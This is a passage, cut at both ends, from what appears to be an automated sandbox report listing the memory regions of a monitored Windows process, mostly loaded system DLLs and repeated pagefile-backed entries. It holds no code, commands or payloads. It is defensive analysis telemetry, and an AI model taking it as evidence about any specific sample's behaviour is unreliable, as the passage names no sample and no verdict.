(normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 511 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 512 start_va = 0x6f6c0000 end_va = 0x6f723fff monitored = 0 entry_point = 0x6f6dafd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 513 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 514 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 515 start_va = 0x49d0000 end_va = 0x49d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 516 start_va = 0x6f6b0000 end_va = 0x6f6bffff monitored = 0 entry_point = 0x6f6b4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 517 start_va = 0x6f690000 end_va = 0x6f6affff monitored = 0 entry_point = 0x6f69d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 518 start_va = 0x6f660000 end_va = 0x6f68bfff monitored = 0 entry_point = 0x6f67bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 519 start_va = 0x49e0000 end_va = 0x49e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 520 start_va = 0x6f630000 end_va = 0x6f637fff monitored = 0 entry_point = 0x6f631d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 521 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 522 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 523 start_va = 0x49d0000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 524 start_va = 0x4a10000 end_va = 0x4b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 525 start_va = 0x6f640000 end_va = 0x6f659fff monitored = 0 entry_point = 0x6f64fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 526 start_va = 0x4b10000 end_va = 0x4b19fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 527 start_va = 0x4b20000 end_va = 0x4b23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 528 start_va = 0x4b30000 end_va = 0x4b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 529 start_va = 0x4b20000 end_va = 0x4b23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 530 start_va = 0x4b30000 end_va = 0x4b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 531 start_va = 0x4b20000 end_va = 0x4b22fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b20000" filename = "" Region: id = 532 start_va = 0x4b20000 end_va = 0x4c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 533 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 534 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 535 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 536 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 537 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 538 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 539 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 540 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 541 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 542 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 543 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 544 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 545 start_va = 0x4c20000 end_va = 0x4d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 546 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 547 start_va = 0x4d20000 end_va = 0x4d83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 548 start_va = 0x4d90000 end_va = 0x4ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 549 start_va = 0x764d0000 end_va = 0x764d5fff monitored = 0 entry_point = 0x764d1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 550 start_va = 0x6f860000 end_va = 0x6f865fff monitored = 0 entry_point = 0x6f8615d0 region_type = mapped_file name = "mssip32.dll" filename = "\\Windows\\SysWOW64\\mssip32.dll" (normalized: "c:\\windows\\syswow64\\mssip32.dll") Region: id = 551 start_va = 0x6f7a0000 end_va = 0x6f851fff monitored = 0 entry_point = 0x6f7cd9f0 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\SysWOW64\\wuapi.dll" (normalized: "c:\\windows\\syswow64\\wuapi.dll") Region: id = 552 start_va = 0x4ed0000 end_va = 0x4ed1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ed0000" filename = "" Region: id = 553 start_va = 0x6f5e0000 end_va = 0x6f5fcfff monitored = 0 entry_point = 0x6f5f6450 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\SysWOW64\\updatepolicy.dll" (normalized: "c:\\windows\\syswow64\\updatepolicy.dll") Region: id = 554 start_va = 0x6f570000 end_va = 0x6f5d4fff monitored = 0 entry_point = 0x6f5a6fb0 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\SysWOW64\\msvcp110_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp110_win.dll") Region: id = 555 start_va = 0x6f790000 end_va = 0x6f796fff monitored = 0 entry_point = 0x6f791700 region_type = mapped_file name = "softpub.dll" filename = "\\Windows\\SysWOW64\\softpub.dll" (normalized: "c:\\windows\\syswow64\\softpub.dll") Region: id = 556 start_va = 0x6f530000 end_va = 0x6f56afff monitored = 0 entry_point = 0x6f537e00 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\SysWOW64\\activeds.dll" (normalized: "c:\\windows\\syswow64\\activeds.dll") Region: id = 557 start_va = 0x6f4f0000 end_va = 0x6f527fff monitored = 0 entry_point = 0x6f50d280 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll") Region: id = 558 start_va = 0x742e0000 end_va = 0x74332fff monitored = 0 entry_point = 0x74300a10 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 559 start_va = 0x6f4c0000 end_va = 0x6f4ebfff monitored = 0 entry_point = 0x6f4c48a0 region_type = mapped_file name = "advpack.dll" filename = "\\Windows\\SysWOW64\\advpack.dll" (normalized: "c:\\windows\\syswow64\\advpack.dll") Region: id = 560 start_va = 0x76d60000 end_va = 0x7716afff monitored = 0 entry_point = 0x76d8adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 561 start_va = 0x6f4a0000 end_va = 0x6f4b7fff monitored = 0 entry_point = 0x6f4b16d0 region_type = mapped_file name = "amstream.dll" filename = "\\Windows\\SysWOW64\\amstream.dll" (normalized: "c:\\windows\\syswow64\\amstream.dll") Region: id = 562 start_va = 0x6f3b0000 end_va = 0x6f49dfff monitored = 0 entry_point = 0x6f3c6bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 563 start_va = 0x6f3a0000 end_va = 0x6f3a6fff monitored = 0 entry_point = 0x6f3a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 564 start_va = 0x6f370000 end_va = 0x6f394fff monitored = 0 entry_point = 0x6f384cd0 region_type = mapped_file name = "appxsip.dll" filename = "\\Windows\\SysWOW64\\AppxSip.dll" (normalized: "c:\\windows\\syswow64\\appxsip.dll") Region: id = 565 start_va = 0x6f1f0000 end_va = 0x6f36ffff monitored = 0 entry_point = 0x6f27c630 region_type = mapped_file name = "opcservices.dll" filename = "\\Windows\\SysWOW64\\OpcServices.dll" (normalized: "c:\\windows\\syswow64\\opcservices.dll") Region: id = 566 start_va = 0x6f600000 end_va = 0x6f62cfff monitored = 0 entry_point = 0x6f612b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 567 start_va = 0x850000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 568 start_va = 0x6f150000 end_va = 0x6f1edfff monitored = 1 entry_point = 0x6f1b5ac0 region_type = mapped_file name = "certca.dll" filename = "\\Windows\\SysWOW64\\certca.dll" (normalized: "c:\\windows\\syswow64\\certca.dll") Region: id = 569 start_va = 0x6f0f0000 end_va = 0x6f146fff monitored = 1 entry_point = 0x6f12e160 region_type = mapped_file name = "certcli.dll" filename = "\\Windows\\SysWOW64\\certcli.dll" (normalized: "c:\\windows\\syswow64\\certcli.dll") Region: id = 570 start_va = 0x6f0d0000 end_va = 0x6f0e5fff monitored = 0 entry_point = 0x6f0d5c10 region_type = mapped_file name = "certpoleng.dll" filename = "\\Windows\\SysWOW64\\CertPolEng.dll" (normalized: "c:\\windows\\syswow64\\certpoleng.dll") Region: id = 571 start_va = 0x6f020000 end_va = 0x6f0c4fff monitored = 0 entry_point = 0x6f03ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 572 start_va = 0x6eff0000 end_va = 0x6f012fff monitored = 0 entry_point = 0x6eff5570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 573 start_va = 0x7fdf0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 574 start_va = 0x6efc0000 end_va = 0x6efe7fff monitored = 0 entry_point = 0x6efc7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 575 start_va = 0x6ef40000 end_va = 0x6efb0fff monitored = 0 entry_point = 0x6ef969e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 576 start_va = 0x6fe00000 end_va = 0x6fec7fff monitored = 0 entry_point = 0x6fe6ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 577 start_va = 0x6eef0000 end_va = 0x6ef38fff monitored = 0 entry_point = 0x6eef6450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 578 start_va = 0x4ee0000 end_va = 0x4fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 579 start_va = 0x4fe0000 end_va = 0x511ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 580 start_va = 0x50480000 end_va = 0x504aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Region: id = 581 start_va = 0x6fc60000 end_va = 0x6fdaafff monitored = 0 entry_point = 0x6fcc1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 582 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 583 start_va = 0x5120000 end_va = 0x521ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 584 start_va = 0x5220000 end_va = 0x525ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 585 start_va = 0x5260000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 586 start_va = 0x5360000 end_va = 0x5360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005360000" filename = "" Region: id = 587 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 588 start_va = 0x6fa40000 end_va = 0x6fc5bfff monitored = 0 entry_point = 0x6fc0bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 589 start_va = 0x5370000 end_va = 0x5370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 590 start_va = 0x5380000 end_va = 0x5383fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 591 start_va = 0x5390000 end_va = 0x53d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 592 start_va = 0x53e0000 end_va = 0x53e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 593 start_va = 0x53f0000 end_va = 0x547dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 594 start_va = 0x5480000 end_va = 0x5490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 595 start_va = 0x54a0000 end_va = 0x54a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 596 start_va = 0x54b0000 end_va = 0x54c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 597 start_va = 0x54d0000 end_va = 0x54d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054d0000" filename = "" Region: id = 657 start_va = 0x54a0000 end_va = 0x54affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 658 start_va = 0x54e0000 end_va = 0x55dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054e0000" filename = "" Region: id = 659 start_va = 0x55e0000 end_va = 0x55fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055e0000" filename = "" Region: id = 660 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 661 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 662 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 663 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 664 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 665 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 666 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 667 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 668 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 669 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 670 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 671 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 672 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 673 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 674 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 675 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 676 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 677 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 678 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 679 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 680 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 681 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 682 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 683 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 684 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 685 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 686 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 687 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 688 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 689 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 690 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 691 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 692 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 693 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 694 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 695 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 696 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 697 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 698 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 699 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 700 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 701 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 702 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 703 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 704 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 705 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 706 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 707 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 708 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 709 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 710 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 711 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 712 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 713 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 714 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 715 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 716 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 717 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 718 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 719 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054a0000" filename = "" Region: id = 720 start_va = 0x54a0000 end_va = 0x54aefff monitored = 1 entry_point = 0x0 